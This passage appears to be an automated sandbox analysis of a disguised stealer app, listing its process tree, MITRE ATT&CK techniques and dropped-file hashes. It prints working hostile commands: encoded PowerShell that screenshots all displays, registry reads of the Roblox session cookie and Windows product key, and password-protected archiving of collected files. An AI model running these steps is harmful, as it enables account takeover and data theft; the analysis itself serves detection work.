HAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1568
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wffrzl3o\wffrzl3o.cmdline"
        5⤵
        
        PID:4504
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC4D.tmp" "c:\Users\Admin\AppData\Local\Temp\wffrzl3o\CSCF637D91A795842A883553469D918226C.TMP"
        6⤵
        
        PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5772
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4492
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3220
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5352
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:6064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2796
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI3962\rar.exe a -r -hp"xmugen" "C:\Users\Admin\AppData\Local\Temp\DDknX.zip" *"
    3⤵
    PID:5208
  - - C:\Users\Admin\AppData\Local\Temp\_MEI3962\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI3962\rar.exe a -r -hp"xmugen" "C:\Users\Admin\AppData\Local\Temp\DDknX.zip" *
      4⤵
      Executes dropped EXE
      PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3152
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:8
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:6040
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4456

C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe
"C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5436
- C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\xspammer" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1740,i,13928373072770164733,13138962873558876076,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4616
- C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\xspammer" --standard-schemes=app --secure-schemes=app --bypasscsp-schemes --cors-schemes=app --fetch-schemes=app --service-worker-schemes=app --streaming-schemes --mojo-platform-channel-handle=1912 --field-trial-handle=1740,i,13928373072770164733,13138962873558876076,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4196
- C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\xspammer" --standard-schemes=app --secure-schemes=app --bypasscsp-schemes --cors-schemes=app --fetch-schemes=app --service-worker-schemes=app --streaming-schemes --app-path="C:\Users\Admin\AppData\Local\Programs\xspammer\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2584 --field-trial-handle=1740,i,13928373072770164733,13138962873558876076,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:1100
- C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\xspammer\XSpammer.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\xspammer" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=764 --field-trial-handle=1740,i,13928373072770164733,13138962873558876076,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:3568

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8740e7db6a0d290c198447b1f16d5281

SHA1
ab54460bb918f4af8a651317c8b53a8f6bfb70cd

SHA256
f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

SHA512
d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c0b7d55c67ad131b1dc03433ca106f8c

SHA1
b61136ec809a262aee3b469b54c6cc29cbb1e414

SHA256
87f28e7e15f090f6c169ea02f63ddd04d7dcf065d36e9c7677400ef2e2c236e0

SHA512
cc75110b44b09ee9a51e7b468843a463a690acb8e5fc35d9fbc2e79242a5db06f01ab8b269c39cf58ff48a72f7fae95e8bfdee4755d59c9467d3fcaed3c3468a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
746a0bc5f36068131718d2b2d18f623d

SHA1
e47bcf6ce6f23fef87234940c8a3fd380502b426

SHA256
baab0dbe5b0aa4f0284a8cad88d459c1f5d91d516ea66c616ccdfa58212537ec

SHA512
adf4e45d67e3abaebf600411c5e5ac1f35d106a7408045e12068e67fc379875abcbcd3155fb98f480b9037cadb74bddd395ebc72967a9bc6f915ce5cf734e7cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8e4ff3a0909baedcb1b0262ff5e552ca

SHA1
1034224ce0c0e39fb81789be9ed6d710c4ec0b7d

SHA256
caaf38168b7d72e42d0aed40b07f268d3a8b8155c3c9ca10beb19b0155ff1abe

SHA512
24727aeeeb0a295b8ae9753a29242e299f38eb43e60dd72744e13d08a6bfcd77b8e639da7d266e077dec58c96540a65638cbfe688b9a0a89c990ff4085507644

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4db0fd2ec7377db4df172f45f02d01ad

SHA1
8bbfcd9643d14eabbb33aaed293cfcbe4043d1b0

SHA256
af972244b554e865e7abb6569c16f717d2dca4da14877be60e9d680cd6ce8101

SHA512
ac9400438d299e227483810eb30e3fb57718b06ab0515e55607773152c7f129697a8963eeabff8efe2edff0ffdf599b7c2adbf36a335dec9b4085571b26ea065

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a28115a0b99e1628f4b22fe751626704

SHA1
f6c1a3bb1c46eea1d8ac31551e3b91b2004fc57e

SHA256
8fe0f9cb43d348eeb8de56f9ccca2ca5b787978f2e41b861bb04a5b134839f60

SHA512
7ee7051a3dbe621096dcf7c3b2c0ccd6c5ca30729bf3322597b74e8299c742a5653c73b9a7013a2565dc7a0da3de0af4a6fb4c38417748469983bf1117b16ee1

Download Submit
C:\Users\Admin\AppData\Local\Programs\xspammer\chrome_100_percent.pak

Filesize
126KB

MD5
44a69827d4aa75426f3c577af2f8618e

SHA1
7bdd115425b05414b64dcdb7d980b92ecd3f15b3

SHA256
bca4401b578a6ac0fe793e8519fed82b5444972b7d6c176ec0369ed13beaad7b

SHA512
5c7bdf1f1deb72c79b860bf48f16c19cb19b4d861c0b6beb585512ad58b1bc4b64e24edfcd97233e5b91dcd0f63ed1c7b278d22ec062fd0dfe28fe49cae52049

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAC4D.tmp

Filesize
1KB

MD5
8bae0069f9eb56f891a06c98d3667b9c

SHA1
681f75aa1cede7176805487ac8648f35dff62b2c

SHA256
022fcb720765fb8d2dd1d48cb799379725d447752f5173320d22a3609bbd6137

SHA512
a00c18a7519540afc7a78943c16a9f7a2bd41e07f4157d80b476941fc41eedb902ef0a50447ac4ea0c5096c4bcc342bd5b897f12e1deb1abb4953f6620d8fd78

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\_bz2.pyd

Filesize
46KB

MD5
db5ec505d7c19345ca85d896c4bd7ef4

SHA1
c459bb6750937fbdc8ca078a74fd3d1e8461b11c

SHA256
d3fb8bad482505eb4069fa2f2bb79e73f369a4181b7acc7abe9035ecbd39cec9

SHA512
0d9fdb9054e397bc9035301e08532dc20717ec73ad27cf7134792a859ca234ab0cd4afa77d6cb2db8c35b7b0bccf49935630b3fe1bd0a83a9be228b9c3d8c629

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\_ctypes.pyd

Filesize
56KB

MD5
26e65481188fe885404f327152b67c5e

SHA1
6cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d

SHA256
b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786

SHA512
5b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\_decimal.pyd

Filesize
104KB

MD5
072e08b39c18b779446032bf2104247b

SHA1
a7ddad40ef3f0472e3c9d8a9741bd97d4132086c

SHA256
480b8366a177833d85b13415e5bb9b1c5fda0a093ea753940f71fa8e7fc8ed9b

SHA512
c3cdfe14fd6051b92eeff45105c093dce28a4dcfd9f3f43515a742b9a8ee8e4a2dce637e9548d21f99c147bac8b9eb79bcbcd5fc611197b52413b8a62a68da02

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\_hashlib.pyd

Filesize
33KB

MD5
82d28639895b87f234a80017a285822a

SHA1
9190d0699fa2eff73435adf980586c866639205f

SHA256
9ec1d9abac782c9635cdbbb745f6eab8d4c32d6292eebb9efd24a559260cb98e

SHA512
4b184dcc8ccf8af8777a6192af9919bcebcdcddd2a3771ed277d353f3c4b8cb24ffa30e83ff8fbeca1505bf550ea6f46419a9d13fef7d2be7a8ac99320350cfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\_lzma.pyd

Filesize
84KB

MD5
8bdd52b7bcab5c0779782391686f05c5

SHA1
281aad75da003948c82a6986ae0f4d9e0ba988eb

SHA256
d5001fbee0f9c6e3c566ac4d79705ba37a6cba81781eee9823682de8005c6c2a

SHA512
086c5e628b25bc7531c2e2f73f45aa8f2182ac12f11f735b3adc33b65a078a62f7032daa58cc505310b26b4085cae91cb4fa0a3225fbe6f2b2f93287fee34d4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\_queue.pyd

Filesize
24KB

MD5
3f13115b323fb7516054ba432a53e413

SHA1
340b87252c92c33fe21f8805acb9dc7fc3ff8999

SHA256
52a43a55458c7f617eb88b1b23874f0b5d741e6e2846730e47f09f5499dda7f2

SHA512
6b0383ee31d9bb5c1227981eb0ae5bb40e2d0a540bd605d24e5af455fd08935d726e5f327787d9340950311d8f7a655a7ea70635e1f95d33e089505f16ae64b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\_socket.pyd

Filesize
41KB

MD5
abe1268857e3ace12cbd532e65c417f4

SHA1
dd987f29aabc940f15cd6bd08164ff9ae95c282f

SHA256
7110390fa56833103db0d1edbfd2fe519dd06646811402396eb44918b63e70d5

SHA512
392ac00c9d9e5440a8e29e5bae3b1a8e7ffb22a01692dad261324058d8ef32fedf95e43a144b7e365f7f0fedb0efb6f452c7ccaee45e41e2d1def660d11173c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\_sqlite3.pyd

Filesize
54KB

MD5
00a246686f7313c2a7fe65bbe4966e96

SHA1
a6c00203afab2d777c99cc7686bab6d28e4f3f70

SHA256
cd3ade57c12f66331cb4d3c39276cbb8b41176026544b1ca4719e3ce146efe67

SHA512
c0e0f03616336f04678a0a16592fdc91aaa47c9bf11500a5dc3696aef4481f2fcbd64a82be78b30f3ffd4372c9e505edb000bdf05f2ad07bac54a457bb20bf7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3962\_ssl.pyd

Filesize
60KB

MD5
0c06eff0f04b3193a091aa6f77c3ff3f

SHA1
fdc8f3b40b91dd70a65ada8c75da2f858177ca1b

SHA256
5ecfe6f6ddf3b0a150e680d40c46940bc58334d0c622584772800913d436c7e2

SHA512
